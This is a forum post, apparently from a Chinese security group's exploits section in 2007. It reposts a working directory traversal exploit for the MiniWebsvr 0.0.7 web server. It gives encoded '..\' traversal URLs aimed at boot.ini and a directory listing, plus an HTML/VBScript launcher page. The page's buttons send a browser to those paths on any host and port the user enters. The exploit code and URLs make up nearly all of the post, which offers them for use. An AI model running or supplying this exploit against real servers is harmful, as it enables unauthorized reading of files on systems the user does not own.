MiniWebsvr 0.0.7 Remote Directory Transversal Exploit

pub!1c

魔

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 3926
精华: 128
积分: 209876
阅读权限: 200
性别: 男
在线时间: 1117 小时
注册时间: 2007-10-23
最后登录: 2008-11-17

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2007-4-15 00:47 只看该作者

MiniWebsvr 0.0.7 Remote Directory Transversal Exploit

复制内容到剪贴板

代码:

<pre>

<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------

<b>MiniWebsvr 0.0.7 Directory transversal vulnerability</b>

url: [url]http://miniwebsvr.sourceforge.net/[/url]

author: shinnai

mail: shinnai[at]autistici[dot]org

site: [url]http://shinnai.altervista.org[/url]



[url]http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini[/url] or

[url]http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../[/url]

-------------------------------------------------------------



Host      Port

<input type=text name=txtIP value = "localhost">  <input type=text name=txtPort value = "8080">



<input language=VBScript onclick=GetBoot() type=button value="Click to get boot.ini">



<input language=VBScript onclick=BrowseMe() type=button value="Click to browse">



<script language=&#39;vbscript&#39;>

Sub GetBoot

 on error resume next

 document.location = "http://" + txtIP.value + ":" + txtPort.value + "/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini"

end sub



Sub BrowseMe

 on error resume next

 document.location = "http://" + txtIP.value + ":" + txtPort.value + "/%5C..%5C..%5C..%5C..%5C..%5C../"

end sub

</script>

</span></span>

</code></pre>

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » MiniWebsvr 0.0.7 Remote Directory Transversal Exploit